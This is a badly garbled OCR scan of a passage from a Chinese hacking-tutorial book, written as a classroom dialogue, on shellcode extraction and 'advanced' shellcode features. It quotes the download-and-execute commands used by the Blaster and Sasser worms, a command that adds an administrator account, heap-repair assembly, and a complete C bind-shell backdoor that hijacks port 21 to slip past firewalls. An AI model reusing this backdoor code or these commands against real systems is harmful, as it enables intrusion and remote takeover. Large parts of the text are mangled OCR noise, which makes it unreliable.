| | 3m naüpooaoo? ZE DD JD 0А 24 DO 00 00 00 00 OD OD | node....5 
E Ке | nona 73 C7 78 FB 73 C7 78 ЕВ 73 C7 7B FB 72H ES HA HB E TS I 

| 00000090 78 C7 78 FB 9B ра 72 F8 47 C7 76 ЕВ ГГУ ЗА Е ЕІ 

а "| ooooooan 70 C7 78 FB 73 C7 79 ЕВ 43 C7 78 ЕВ ЕАН AT PR I 

000000B0 | 71 07 78 FB 52 69 63 68 73 C7 7B 5 Е R їсһ= ES I 
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“我 们 在 EXE 文 件数 据 中 查找 ， 找 到 ShellCode 的 开头 ， 如 这 里 是 55 83 ЕС 64， 如 图 6 一 16。” 
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State: original $ 00001000 TA... ERR 
TA NS пд 00001010 Uit Dg абла {= ... 

Lndo reverses: па 00001020 Н ЛАРА ..В. 
00001030 „808. :©ё 0. .Ulid 

Prenton uma; MANAA 00001040 3502... f. 05. m 
"S MEER 00001050 т. .х. ВЛ. 

Last write lime: 人 00001060 Жо? Сеїгэ. 
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6.2.2 可 执行 文件 提取 
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“找到 ShellCode 的 开始 数据 之 后 ， 我 们 将 其 复制 ， 粘 贴 出 来 ， 也 可 轻松 完成 ShellCode 的 提取 
du 

"M ! 真是 好 方法 啊 。 但 定位 ShellCode 的 开始 和 结束 有 点 麻烦 啊 ! ” 

“我 们 可 以 加 入 一 些 标 志 ， 比 如 连续 的 几 个 "0x90” (BUINOP) 来 表示 ShellCode 的 开始 和 结束 。 
方法 是 人 想 出 来 的 ， 路 是 人 走出 来 的 。” 

让 接 利 用 C 话 言 写 程序 ， 然 后 自动 提取 打印 出 





“好 ， 我 们 再 来 看 一 个 更 经 典 的 方法 
ShellCode3E, " 


6.2.3 C 语 言 下 接 提 取 
а= Сс = 552° 


"ER, ИФ ЊНСЕАЖЕ, ETRE. "E36, “应 该 说 是 ShellCode 部 分 由 汇编 和 CC 语言 
混合 编程 。 汇 编 部 分 主要 是 完成 动态 定位 孙 数 地 址 ， 而 C 语 说 部 分 是 完成 程序 的 功能 流程 。 整 
个 程序 的 本 质 ， 束 是 让 编译 器 为 我 们 生成 二 进 制 代码 ， 然 后 在 运行 时 编码 、 打 印 ， 这 样 束 完 
成 了 一 个 模板 。” 


S L иш. 融会 发 现 这 三 种 提取 方法 都 是 类 似 的 一 一 都 是 下 
接 把 二 进 制 代码 拷贝 出 来 。 


“I | » 


“给 大 家 解释 一 下 混合 编程 的 结构 以 及 流程 思路 吧 ! C 语 言 直接 写 ShellCode 的 思路 ， 最 早 也 可 
从 yuange 文 章 中 见 到 ， 而 hume 将 其 发 扬 光 大 。” 


“混合 编程 里 有 4 个 函数 : ShellCodesE4šX. DecryptScHžt, РгіпіЅбс Е 1таіпр 3%, ” 


“在 ShellCodes 画 数 里 面 ， 生 成 完成 功能 的 ShellCode， 采 用 的 是 汇编 和 C 语 言 混合 编程 。" 老 
病 说 道 , “首先 是 汇编 部 分 ， 融 是 动态 获得 每 个 要 使 用 函 效 的 地 址 ; 然后 用 C 语 言 来 直接 调用 
рч, 完成 想 要 的 功能 。 


“DecryptSc 国 数 ， 是 生成 解码 代码 decode 的 部 分 ; ' 
“PrintSc 函 数 ， 是 直接 把 合 好 的 ShellCode 按 16 进 制 数 的 形式 打印 出 来 。 
而 main 画 数 ， 束 是 把 各 个 部 分 组 织 起 来 ， 以 自动 化 的 生成 ShellCcode 并 打印 出 来 。 


“具体 来 说 ，main 了 落 数 里 面 先 定义 要 查找 的 娘 数 名 和 所 在 的 模块 ; 2A IS RE DecryptScPR 24 4E 
成 的 decode 部 分 ; 再 把 ShellCodes 辑 数 生 成 的 代码 进行 编码 ， 粘 贴 在 decode 后 面 ; 最 后 调用 
PrintSc 画 数 ， 把 最 终 完成 的 ShellCode 打 印 出 来 。 其 流程 如 图 6 一 17。 


Main) E 2 


ЖА ДАРресгурі$с DecryptSc HA O 
国 数 的 代码 生成 解码 代码 


粘贴 ShellCodes ShellC odes 函数 () 
图 数 的 代码 





“其 他 几 个 函数 都 好 理解 ， 关 键 束 是 ShellCodes 函 数 代码 部 分 的 生成 。 


“ShellCodes 辑 数 分 为 两 大 部 分 ， 动 态 获得 画 数 地 址 就 不 说 了 ， 我 们 刚才 学 了 几 种 方法 ， 都 是 
可 以 的 ; 而 高 级 语言 调用 了 回 数 的 部 分 ，hume 采 用 的 是 榴 举 方法 执行 。” 


函数 名 称 数 组 和 枚 举 数 组 对 应 ， 增 加 API 时 只 需 在 相应 的 .dl 后 增加 本 数 名 称 项 ， 并 同步 更 新 
Enum 的 索引 。 调 用 API 时 直接 使 用 API APINAME; 即 可 。 像 这 样 :” 


API[ MessageBeep](0x10); 
API[ MessageBoxA](0,testAddr,0,0x40); 
API[ ExitProcess](90); 


“ЕР л, HiCibmmShellCodeszs же х{ {5 ^E БУ C 481€ 8381179 1 SR % BT Bz, AEA 


处 理 起 来 也 不 是 很 省 力 ， 不 过 一 旦 模板 写成 ， 以 后 写 起 来 或 写 复 杂 的 ShellCode 时 ， 就 省 力 多 
de ” 


“我 们 来 测试 一 下 吧 1 "大 家 跃跃欲试 。 


“程序 大 家 可 参看 GetShellCodeByC.cpp ( 光 间 有 收录 ) 。 注 意 了 ， 我 们 需要 对 工程 正确 的 配 
置 才能 达到 效果 。 "老病 提 醒 道 ,我 们 要 选择 release 版 编译 ， 并 去 挥 优化 选项 。 


“优化 ? SU a] zie ?” 


“打开 菜单 下 的 ' 工 程 一 设置 ' 对 话 框 ， 在 'C/C++' 选 项 卡 下 删除 /02' 项 ， 如 图 6 一 18。 


Project Settings 


settings For: [Win32 Release "| General | Debug C/C++ | Link | Resources | Bi 


FE GetShellCodeByC 


Category: [General "| Reset | 
Warning level: Optimizations: 

[Level 3 "| Maximize Speed 

[ Warnings as errors | Generate browse info 


Debug info: 


Preprocessor definitions: 
WIN32,NDEBUG, CONSOLE, MBCS 


Project Options: 

{nologo IML АУЗ IGX JD 'WIN32" TTE] ID "NDEBUG" /D 

" CONSOLE" ID " MBCS" 
IFp"Release/GetShellCodeByC.pch" 7YX JFo"Release7"' 3 


"OK, 18526, #11217, Mo ИЛЕ, JRHÁSSUTTEDERRBJShellCode, 186 
— 19, » 
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“о GetShellCodeByC 一 Nicrosoft Visual C++ — [GetShellCodeByt. с] 


[8] File Edit View Insert Project Build Tools DriverStudio Window Help 


à = ug йз e =+ p e | — oai 


[Globals] z] [АП а members = | @ main Ja || e [95 À s| x^ 








alx] | include €stdio.h? 
Binclude <winioctl.h> 





- TE GetShellCodeByC classes 


- 3 Globals ваеғіпе DEBUG 1 
ф Decry 

总 mainli 
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E k". WIR “a 
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“a s; IAE xa" 
xX3J9*x4d4o3Bx3Ja*xx3B8*x3£F x39; —— Iw de sga" 
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Вч 4f чи REL ELR REIR ILES HEIL 4а i sm s ta зл ые | 
B*x4dax3Hx3fF *x3*x47 dab SS 38 sx qa чх З“: X "T xdg xS a 
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ызы А ое ЕЕ чиј Ыз a a.i Pa si? 
“=b he 1l total are 810 bytes = 


"3ClassView | =] f 





>l Linkind.. 
A 


Build / Debug X Find in Files 1 4| | 
“ 哇 1 好 方便 啊 1” 


“是 啊 ! 大 家 下 来 自己 测试 一 下 ， 对 应 着 改变 API 画 数 的 名 称 和 枚 举 值 ， 测 试 完 成 一 下 其 他 的 
功能 。” 老 炳 说 道 。 


“好 哩 ! 真是 太 有 趣 了 1” 


“大 家 可 要 注意 整理 文档 ， 记 下 方法 。” 老 病 说 道 ,“ 好 记性 不 如 烂 笔头 ， 多 学 多 记 总 有 好 处 
的 。” 


6.3 ShellCode 的 高 级 功能 


“通用 性 可 以 了 ， 提 取 也 方便 了 。 我 们 现在 想 给 ShellCode 添 加 什么 功能 融 可 添加 什么 功能 
f. Rl, ART ERWE. 


“Ha A {#5$һе!!Соде £ rii HIT, ПЁ}, јо В "mu. 
“我 们 可 以 宇 一 个 万 能 的 ShellCode 啦 ! " 宇 强 也 附和 着 。 


“当然 可 以 ， 但 功能 越 强 ， 代 码 融 越 长 。 同 ShellCode 需 要 尽量 宕 小 是 矛盾 的 。 "老病 比喻 
3B, “5 (1078382, IERI RAZAR, SUE UEBFAT." 


“ 哦 ! 怪不得 有 ' 要 风度 不 要 温度 ' 一 说 啊 1” 宇 强 说 这 人 句 话 时 转向 劳 边 的 小 倩 。 
“Alm! 认真 听课 1” 


“但 有 一 些 功能 是 ShellCode 里 面 应 该 考虑 到 的 ， 我 们 讨论 几 个 常用 的 技巧 吧 1” 


6.3.1 = MERE 
“第 一 个 技巧 就 是 恢复 堆 链表 。" 


“我 们 在 堆 浴 出 利用 时 说 过 ，” 老 病 说 道 ，“ 需 要 把 堆 链 表 进 行 恢复 ， 才 能 运行 一 些 
ShellCode, " 


“恢复 的 思路 就 是 : 找到 系统 中 堆 结 构 的 开始 地 方 ， 把 履 盖 后 的 堆 块 还 给 系统 。” 


“在 这 里 ， 我 们 没有 必要 详细 讲解 Windows 的 堆 结 构 了 。 直 接 给 出 恢复 堆 链 表 久 理 代 码 和 解释 
ng | 


//XP edii 十 74 是 下 一 扒 块 管理 结构 ， 如 果 是 win2000， 融 是 esi 十 0Xx4C 
mov edx, dword ptr[edi+74] 

// 把 ebx 赋 为 0x18 

push 0x18 

pop ebx 

// 得 到 TEB，fs: [18] 和 fs:[9] 都 是 指向 TEB 的 

mov eax, dword ptr fs:[ebx] 

/ / A TEB-- 0x30fS $IIPEB 

mov eax, dword ріг [еах+охзо ] 

// PEB 十 9x18 为 默认 堆 地 址 指针 

mov eax, dword ptr[eax-*0x18] 

// 把 TotalFreeSize 的 值 给 堆 管 理 结 构 的 第 一 部 分 Size 
add а1, 0х28 

mov si, мога ptr[eax] 

mov word ptr[edx],si 

// 把 堆 管 理 结构 第 二 部 分 Sizeprevious size 设 成 8 
inc edx 

inc edx 

mov byte ptr[edx], 0x08 

// 设 置 堆 管理 结构 的 其 他 部 分 

inc edx 

mov si, word ptr[edx] 

xor word ptr[edx],si 

inc edx 

inc edx 

mov byte ptr[edx], 0x14 

inc edx 

mov si, word ptr[edx] 

xor word ptr[edx],si 

inc edx 

inc edx 

// ЖЕН +0х1788 675 5 FreeListszi dj 

add ах, 0x150 

// 让 FreeLists[0].Flink 和 FreeLists[0].Blink 都 指向 堆 管 理 结构 
mov dword ptr[eax],edx 

mov dword рег [еах+4]|, edx 

/ NESH E 6 [аЈЕгееііѕіѕ, 5л 
mov dword ptr[edx],eax 

mov dword ptr[edx-4],eax 


“至 于 Windows 挫 结构 的 讲解 ， 以 后 有 机 会 我 们 再 讲 吧 ! "老病 说 道 , “现在 我 们 直接 拿 来 用 。 
在 一 般 的 ShellCode 前 加 上 这 段 代 码 ， 束 可 恢复 履 盖 掉 的 堆 结 构 。” 


6.3.2 TTP 和 FTP 客 户 端 冲击 波 / 震 水波 传播 的 实现 


“而 第 二 个 技巧 ， 束 是 考虑 蠕虫 病毒 们 的 传播 扩 巧 。” 





“Nimda、 冲 击 波 以 及 震荡 波 蠕 虫 ， 都 佛 给 网 络 带 来 巨大 的 破坏 ， 其 传播 速度 之 快 ， 除 了 很 多 
机 器 系统 本 身 具 有 漏洞 之 外 ， 还 有 个 重要 的 原因 : 蠕虫 具有 很 强 的 在 网 络 上 自我 复制 和 传输 
的 能 力 。” 


大 家 都 认真 的 听 看 。 


“我 们 这 里 只 分 析 它 们 的 传播 方法 ， 不 教 大 家 如 何 写 蠕虫 病毒 1 "老病 强调 说 ,“ 让 大 家 知道 怎 
样 更 好 的 防范 。” 


“н, АУ, ЕЕЕ” 


“Nimda 和 冲击 波 在 网 络 上 的 自我 复制 和 传输 ， 是 利用 TFTP 来 实现 的 ; 而 震荡 波 ， 则 是 进行 了 
改进 ， 用 FTP 实 现 的 。” 


“让 我 们 来 看 看 TFTP 是 如 何 工 作 的 。 以 下 载 文 件 为 例 ， 在 开始 工作 时 ， 客 户 发 送 一 个 读 请 求 给 
服务 器 ， 如 果 请 求 的 文件 能 被 读 取 ，TFTP 服 务 器 就 返回 一 个 块 编号 为 1 的 数据 分 组 ; TFTP 客 
户 发 送 一 个 块 编号 为 1 的 ACK ; TFTP 服 务 器 随后 发 送 块 编号 为 2 的 数据 ; TFTP 客 户 发 回 块 编 

号 为 2 的 ACK。 重 复 这 个 过 程 ， 直 至 这 个 文件 传送 完毕 。” 


小 知识 : TFTP 是 基于 UDP 的 ， 其 数据 报 有 四 种 类 型 

第 一 种 : 客户 发 出 的 是 读 或 写 请 求 ， 含 有 文件 名 和 模式 。 操 作 码 是 1 或 2。 
第 二 种 : 服务 器 发 送 的 数据 ， 含 有 块 编号 和 512 字 节 的 数据 。 操 作 码 是 3。 
第 三 种 : 客户 发 的 回应 ， 含 有 上 收 到 的 块 编号 。 操 作 码 是 4。 

第 四 种 : 错误 信息 ， 含 有 震 错 码 和 杖 错 信 息 。 操 作 码 是 5。 


其 类 型 如 图 6 一 20， 我 们 可 据 此 编写 出 TFTP 的 服务 器 。 


|K——— — РИШ —— 
= —— ЮНИ ————————= 
| 一 一 TFTP 数 据 报 


usq | ，、 ,| 操作 码 | 
IP E р UDP B iib | (1-RRQ) 
(2-WRQ) 


操作 码 | Lus 
I(3=data) AA 


块 编 号 


操作 码 | 22 


(5-emor)|- E 





“好 了 ， 说 了 这 么 多 ， 在 Windows 中 ， 我 们 利用 现成 的 TFTP 服 务 程序 来 实现 上 传 和 下 载 文 件 是 
很 简单 的 。TFTPD32.exe 是 个 很 好 的 TFTP 服 务 器 ， 由 Ph.Jounin 编 写 。 直 接 运 行 
TFTPD32.exe， 就 可 建立 一 个 TFTP 服 务 器 。 可 以 选择 要 绑 定 的 IP 和 目录 文件 夹 ， 其 运行 界面 
如 图 6 一 21。 ” 





Titpd32 by Ph. Jounin 





Current Directoru [C^ 


Server interfaces |192.158.1.165 o Show Dir - 






Titp Server | 












Listening on port 53 


Clear | Current Action 


About | Settings Help | 
“II TF TPB Р тхе Windows А By. 12417 MERZ {7 TFTP -i IP Get (Put) FileName 
融 可 在 本 机 执行 TFTP 客 户 病 ， 以 供 和 服务 器 传输 文件 。 如 图 6 一 22， 在 IP 为 192.168.1.166 的 
TFTP 服 务 器 上 下 载 了 一 个 名 为 ww.txt 的 文件 。” 
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G: s2tftp -i 192.168.199.1 get ww.txt 
Iranster successful: 19 bytes 1п і second, 19 l q: Fp as 





4 | 


“iX Ja t LES SF. : 他 们 在 目 己 的 主机 上 建 一 个 TFTP 服 务 右 ， 进 入 别人 的 主机 后 ， 下 接 输 
tftp -i B cip Get (Put) FileName 融 可 实现 文件 上 传 / 下 载 ， 如 下 载 目 己 感 兴趣 的 东 东 ， 或 上 传 
一 个 木马 之 类 的 。” 


“然而 在 Nimda 和 冲击 波 等 病毒 中 ， 它 们 用 的 是 谁 的 TFTP 服 务 器 呢 ? 肯定 不 会 是 用 TFTPD32 
建立 的 服务 器 吧 ! 那 是 谁 建 的 服务 器 呢 ? "同学 们 问 道 。 


оа, эхе : 病毒 自己 ! 在 病毒 程序 中 ， 目 己 实 现 了 一 个 TFTP 服 务 器 ! ” 


“ПГ 2 » 


“站 击 波 运行 时 ， 分 成 了 两 个 线程 。” 
“其 中 一 个 线程 功能 是 : 在 本 机 绑 定 并 监听 69 端 口 ， 建 立 一 个 TFTP 服 务 器 等 待 别 的 机 器 来 连 
接 。 如 果 有 其 他 主机 连接 这 个 服务 器 ， 则 会 把 msblast.exe 文 件 传 送 过 去 。” 


“ 另 一 个 就 是 攻击 线程 。 它 向 其 他 主机 的 135 端 口 发 送 攻 击 代码 一 一 ShellCode， 如 果 其 他 主机 
有 系统 漏洞 ， 就 会 执行 攻击 代码 。 而 它 的 攻击 代码 是 精心 构造 的 ， 所 完成 的 功能 就 是 执行 
TFTP -i ip GET msblast.exe 去 下 载 冲 击 波 程序 ， 下 载 完 毕 后 并 且 执 行 。” 





“ 哦 ， 冲 击 波 的 ShellCode 就 只 是 TFTP -i ip GET msblast.exe 这 句 话 啊 ? 那 和 我 们 的 
ShellCode 比 起 来 ， 差 远 了 也 І ”古风 说 道 。 


“呵呵 ! 是 的 ， 通 过 改 ShellCode 和 履 盖 地 址 ， 可 使 它 的 功能 更 通用 、 强 大 。"” 老 证 说道 , “我 们 
再 来 看 看 震荡 波 ， 它 是 通过 FTP 来 传播 的 。” 


“FTP 和 TFTP 相 上 比较， 功能 更 加 完善 ， 不 仅 可 完成 上 传 和 下 载 文件 的 功能 ， 还 可 列 出 目录 ， 可 
进行 用 户 名 和 密码 的 认证 ， 并 且 可 对 文件 传送 与 存储 方式 进行 选择 等 。 在 Windows 下 ， 有 许 
多 可 以 建立 FTP 服 务 器 的 软件 ， 比 如 Serv U. WP _ FTP 等 ， 还 可 安装 IIS 服 务 来 建立 FTP 服 务 
器 等 。” 


“震荡 波 运 行 时 ， 也 是 分 成 了 多 个 线程 。 其 中 一 个 是 在 本 机 的 5554 新 口 上 ， 产 生 一 个 小 型 的 
FTP 服 务 器 ! 震荡 波 就 利用 这 个 服务 器 来 向 其 他 有 漏洞 的 主机 发 送 里 虫 本 身 文件 1” 


“ 接 下 来 ， 晨 荡 波 向 其 他 主机 发 送 攻击 代码 ， 如 果 对 方 主 机 有 漏洞 ， 则 会 在 9996 端 口 绑 定 一 个 
Shell， 并 且 会 执行 以 下 命令 : echo off&echo open [infecting machine's IP] 
5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get 
[rand] up.exe>>cmd.ftp&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&[rand]i up.exe&echo 
off&del cmd.ftp&echo on " 


“我 对 上 面 的 命令 解释 一 下 。 大 家 知道 ，'& 前 后 的 命令 在 DOS 下 会 依次 执行 。 比 如 net use ww 
/add & net localgroup administrators ww /add ， 就 会 先 添 加 一 个 名 为 "ww' 的 用 户 ， 然 后 再 
将 ww' 加 入 管理 员 组 。” 


“这 里 震荡 波 先 使 用 重 定向 符号 '>>' 向 cmd.ftp 文 件 中 输入 :” 


open [infecting machine's IP] 5554 // 连 接 5554 端 口 ， 即 进入 小 型 FTP 服 务 器 
anonymous // 用 户 名 ， 为 匿名 

user // 密 三 

bin // 二 进 制 模 式 

get [rand] up // 接 收 震 荡 波 蠕虫 的 文件 1 ! 

bye // EH FTPHR 4-28 


“然后 再 用 经 典 的 : ” 


ftp -s:cmd.ftp // 即 用 cmd .ftp 内 的 参数 ， 执 行 ftp， 完 成 下 载 x 


“最 后 执行 许 荡 波 蠕虫 文件 和 删除 cmd.ftp : ” 


[гапа |і up.exe del cmd.ftpx 


“这 样 ， 就 完成 了 震荡 波 从 一 台 主机 向 另 一 台 主机 的 传播 1” 
' 哦 ， 原 来 是 这 样 啊 ! 还 是 比较 简单 啊 |” 
“呵呵 ， 大 家 经 过 这 半期 的 学 习 ， 上 应 该 能 轻松 写 出 比 他 们 更 好 的 功能 吧 ?” 


££ 0 因 


“老病 ， 你 说 他 们 窟 冲击 波 /震荡 波 干 嘛 ? 只 是 传播 一 下 么 ? 对 作者 什么 用 处 也 没有 ?3" 玉 波 问 
3B. 
“他 们 只 是 想 表 达 一 种 表现 欲 ! 希望 别人 佩服 自己 的 能 力 。" 老 证 说 道 , "КЕБЕ Н 


П ! 这 可 是 违法 国家 法 律 的 行为 。” 


是 啊 ! 原来 传说 中 的 冲击 波 / 震 荡 波 病毒 也 没 多 了 不 起 啊 1 ”古风 目 信 的 说 。 


6.3.3 突破 防火 墙 
“而 第 三 个 技巧 ， 就 是 考虑 如 何 突 破 防 火 墙 和 一 些 限 制 环境 了 1" 


“我 们 的 反 连 ShellCode 不 是 可 以 起 到 突破 防火 墙 的 作用 吗 ? " 玉 波 问 道 。 如 图 6 一 23。 
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“是 的 ， 但 那样 需要 我 们 攻击 方 在 公 网 上 ， 有 一 个 公 网 的 IP 地 址 。 如 果 攻 击 方 在 内 网 ， 那 目标 
机 就 反 连 不 上 来 ， 这 种 方式 就 行 不 通 了 ， 如 图 6 一 24。” 
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“IE 1 是 啊 ! 这 种 情况 下 如 何 突破 呢 ? " 衬 强 也 迷糊 了 。 


“呵呵 | 现在 我 们 既 不 能 从 攻击 机 发 起 连 援 ， 因 为 会 被 目标 机 的 防火 墙 阻 断 ; 也 不 能 从 目标 机 
发 起 连接 ， 因 为 到 不 了 攻击 机 的 内 网 。 


“W! 岂 不 是 路 都 堵 死 了 ? "小 倩 说 道 。 

“大 家 不 要 在 一 条 路 上 想 死 了 ， 要 换 一 个 思路 。" 老 病 说 道 。“ 我 们 既然 可 以 给 远程 机 器 发 送 攻 
击 代码 ， 那 么 它们 之 间 应 该 是 连接 的 1 而 远程 机 器 间 的 连接 通信 一 般 都 是 通过 Socket 来 完成 
By. " 

“ 哦 | 我 们 利用 原来 的 连接 ?" 宇 强 叫 了 出 来 。 


“对 ， 如 果 我 们 的 ShellCode 可 以 找到 发 送 攻击 代码 的 那 条 通路 的 Socket， 丈 可 下 接 使 用 以 前 
那个 连接 Socket， 不 用 再 新 建 刀 口 了 ! 如 图 一 25。 


NAT 防火 墙 
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利用 攻击 连接 








PR Hf EE 


"D 1 很 巧妙 啊 1 "人 台 下 感叹 道 。 

“另外 ， 服 务 器 总 要 开 些 端口 ， 我 们 也 可 把 Shell 的 端口 开 在 防火 墙 打 开 的 端口 上 。 "2E JR 
it, OM mO RARER AKS I” 

“比如 ， 对 方 开 放 了 FTP 服 务 ， 那 么 防火 墙 束 需要 打开 21 病 口 。 我 们 的 ShellCode 束 可 复 用 目 


не 在 对 方 的 21 端 口上 线 定 一 个 Shell ; 而 攻击 机 通过 连接 21 端 口 来 获得 Shell。 如 
图 6 一 26。， 
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"T4128 REF EARS з SUD. ! 程序 如 下 :” 


Pu 
线 定 指定 21 端 口 ， 绑 定 cmd .exe 
"Z 
#include <winsock2.h> 
#include <string.h> 
#include <stdio.h> 
#include <tchar.h> 
#include <process.h> 
#include <io.h> 
#pragma comment(lib, "ws2 32") 
int main(int argc, char **argv) 
{ 
// #z)winsock 
WSAData wsa; 
WORD wVersion; 
int ret; 
wVersion = MAKEWORD(2, 0); 
if(WSAStartup(wVersion, &wsa) != 0) 
{ 


return -1; 


} 

// 下 面 获取 本 机 IP 地 址 

char szHostName[128]; 

char *pszIp; 

HOSTENT *pHost = NULL; 
if(gethostname(szHostName, 128)==0) 


pHost = gethostbyname(szHostName ) ; 
if(pHost != NULL) 


pszIp = inet ntoa( *(in_addr*)pHost->h_addr_list[0] ); 
else 


printf("get host ip fail!\n"); 
return -1; 


J 
} 
else 


printf("can't find host name!Nn'); 
return -1,; 


$ 
/ / A RB 4- m E P F 
SOCKET ss; 
if((ss = socket(AF INET, SOCK STREAM, IPPROTO_TCP)) == SOCKET ERROR) 
{ 
printf("error!socket failed!\n"); 
return -1; 


// 设 置 套 接 字 选项 ，SO_REUSEADDR 选 项 就 是 可 以 实现 端口 重 绑 定 的 
// 但 如 果 指 定 了 SO_EXCLUSIVEADDRUSE， 就 不 会 绑 定 成 功 
BOOL val = TRUE; 
if(setsockopt(ss, SOL SOCKET, SO REUSEADDR, (char *)&val, sizeof(val)) != 0) 
{ 
printf("error!setsockopt failed!\n"); 
return -1; 


j 

// 重 新 绑 定 , 这 里 重新 绑 定 21 端 口 

SOCKADDR_IN saddr; 

saddr.sin family = AF INET; 

saddr.sin addr.s addr = inet addr(pszIp); 

saddr.sin port - htons(21); 

if(bind(ss, (SOCKADDR *)&saddr, sizeof(saddr)) -- SOCKET ERROR) 


ret = GetLastError(); 
printf("error!bind failed!^n"); 
return -1; 


listen(ss, 2); 

// 等 待 连接 

SOCKET clientFD; 

SOCKADDR IN caddr; 

int nCaddrSzie; 

nCaddrSzie - sizeof(caddr); 

clientFD = accept(ss, (struct sockaddr *)&caddr,&nCaddrSzie); 
// 连 接 之 后 ， 就 和 双 管 道 后 门 完全 一 样 了 

char Buff[1024]; 

SECURITY ATTRIBUTES pipeattri, pipeattr2; 

HANDLE hReadPipei,hWritePipei,hReadPipe2,hWritePipe2; 
// 建 立 匿名 管道 1 

pipeattri.nLength = 12; 
pipeattri.lpSecurityDescriptor - 0; 
pipeattri.bInheritHandle = true; 
CreatePipe(&hReadPipei,&hWritePipei,&pipeattri,0); 
// 建 立 匿名 管道 2 

pipeattr2.nLength = 12; 
pipeattr2.lpSecurityDescriptor = 0; 
pipeattr2.bInheritHandle = true; 
CreatePipe(&hReadPipe2,&hwritePipe2,&pipeattr2,0); 
STARTUPINFO si; 

ZeroMemory(&si,sizeof(si)); 

si.dwFlags = STARTF USESHOWWINDOW|STARTF USESTDHANDLES; 
si.wShowwindow - SW HIDE; 

si.hStdInput - hReadPipe2; 

si.hStdOutput = si.hStdError = hWritePipei1; 


char cmdLine[] = "cmd"; 
PROCESS INFORMATION ProcessInformation; 
// 建 立 进程 


ret = CreateProcess(NULL, cmdLine, NULL, NULL, 1, O, NULL, NULL, &si,&ProcessInformation); 

JN 

解释 一 下 ， 这 段 代 码 创 建 了 一 个 cmd .exe， 把 cmd ,exe 的 标准 输出 和 标准 错误 输出 用 第 一 个 管道 的 写 句 柄 蔡 换 ; cm 
远程 主机 -~ 入 .管道 1 输出 -管道 1 输入 -输出 (cmd ,exe 子 进程 ) 
远程 主机 -输出 -管道 2 输入 -管道 2 输出 -输入 (cmd .exe 子 进程 ) 

у 

unsigned long lBytesRead; 

while(1) 


// 检 查 管道 |， 即 CMD 进 程 是 否 有 输出 
ret=PeekNamedPipe(hReadPipel,Buff,1024,&lBytesRead,0,0); 
if(lBytesRead) 


// 管 道 1 有 输出 ， 读 出 结果 发 给 远程 客户 机 
ret-ReadFile(hReadPipei,Buff,lBytesRead,&lBytesRead,0); 


if(!ret) break; 
ret=send(clientFD,Buff,lBytesRead,0); 
if(ret<=0) break; 


} 
else 
{ 
// 否 则 ， 接 收 远 程 客户 机 的 命令 
lBytesRead-recv(clientFD,Buff,1024,0); 
if(lBytesRead«-0) break; 
// 将 命令 守 人 管道 2， 即 传 给 $CMD 进 程 
ret=writeFile(hwWritePipe2,Buff,lBytesRead,&lBytesRead,0); 
if(!ret) break; 
} 
} 
WSACleanup(); 
return 0; 





“Нз, хеме ARA : ” 


Setsockopt(ss, SOL_SOCKET, SO_REUSEADDR， (char *)&val, sizeof(val)) != 0 


“ 它 把 套 接 字 'ss' 设 为 重用 ， 这 样 融 可 重新 绑 定 靖 口 了 。: 
古风 说 道 ，“ 听 起 来 很 有 意思 和 用 人 多 也!” 


“ 吧 ， 这 门 课 只 懂得 原理 是 远 远 不 够 的 ， 实 践 玫 是 关键 。 大 家 下 去 也 亲自 测试 一 下 ， 并 考虑 提 
取 成 ShellCode。” 


“НЕ ! 用 汇编 和 C 语 言 下 接 提 取 都 没 问 题 。 "rA ESSERE, 
下 次 课 我 们 会 继续 深入 讲解 漏洞 的 发 现 和 分 析 ! ” 
“那些 更 是 我 们 想 知 道 的 东 东 | 好 啊 ! "同学 们 都 欢呼 起 来 。 
“今天 的 课 就 讲 到 这 里 。 天 气 有 点 冷 ， 大 家 多 注意 身体 。 放 学 1” 


JE 6 BE = 


Q : EXE 文 件 里 提取 出 来 的 ShellCode 是 一 个 字 节 一 个 字 节 分 开 的 ， 如 何 更 高 效 的 自动 生 
成 x01x02x03x04" 的 形式 呢 ? 


A : 我 们 可 采用 蔡 换 的 方式 ， 把 空格 前 接 蔡 换 成 \x”; 也 可 把 字 节 粘贴 在 一 个 文件 中 ， 然 后 写 
一 个 程序 ， 把 每 个 字 节 加 上 ^\x” 标 记 后 打印 出 来 ， 完 成 规 沁 化 ShellCode 的 生成 。 上 比如 下 面 这 
个 程序 束 可 读 取 shellcode.txt 文 本 中 的 字符 ， 然 后 生成 规范 的 ShellCode 数 组 : 


#include<stdio.h> 
int main() 


{ 
FILE *fp; 
fp = fopen("ww.txt", "г" ); 
char shellcode[5]; 
int num - 0; 
printf( ун n )s 
while( fscanf(fp, "%5", ѕһе11сойе) !-EOF ) 
num--; 
printf("NWx?ss", shellcode); 
if(num % 16 == Ө) 
printf("N"NnN""); 
j 
printf("N"Nn"); 
return 0; 
j 


О: 我 们 在 C 语 言 提取 时 ， 要 在 “工程 ?设置 中 去 抒 /O2 "选项 ，”/0O2" 是 什么 意思 ? 
А :“/O2” 表 示 优 化 ， 达 到 最 大 化 速度 。 

Q : 能 讲 一 下 其 他 的 常见 编译 选项 吗 ? 

А: 我 们 结合 具体 的 设置 来 讲 吧 | Release 版 下 的 设置 如 图 6 一 27。 


在 它 的 设置 选项 中 ， 包 
插 /nologo /ML /W3 /GX /D "WIN32" /D "NDEBUG" /D " CONSOLE" /D " MBCS" /Fp"Release/GetShell 


每 一 项 的 具体 解释 如 下 : 


/ML : 与 LIBC,LIB 链 接 

/W3 : 设置 警告 等 级 ， 这 里 是 3 

/GX[-]? : 启用 C++ 异 冲 义理 

/D{=|#} : 定义 宏 

/D "WIN32" : 定义 WIN32， 表 明 是 WIN32 程 序 ; 
/D "NDEBUG" : 没有 调试 信息 

/D " CONSOLE" : 控制 台 程 序 

/D " MBCS" : MBCS 字 集 

/Fp : 命名 预 编译 头 文 件 
/Fp"Release/GetShellCodeByC.pch" : 这 里 预 编 译 头 文件 为 GetShe11CcodeByCc.pch 
/YX[file] : 自动 的 .PCH 文 件 

/Fo : 命名 对 象 文件 

/Fd[file] : 命名 .PDB 文 件 


而 Debug 版 的 设置 如 图 6 一 28。 
Project Settings 
Settings For: | ~ | General | Debug С/С++ | Link | Resources | Bi Bn 


Category: |General MEM - Reset | 


| = etshellCodeByC 
Warning level: Optimizations: 


(Level 3 -| Default -| 


| Warnings as errors ! Generate browse info 





Debug info: 


[None -| 


Preprocessor definitions: 
WIN32,NDEBUG, CONSOLE, MBCS 


Project Options: 


[nologo JML ЛАЗ /GX ID 'WIN32" ID "NDEBUG" ID 
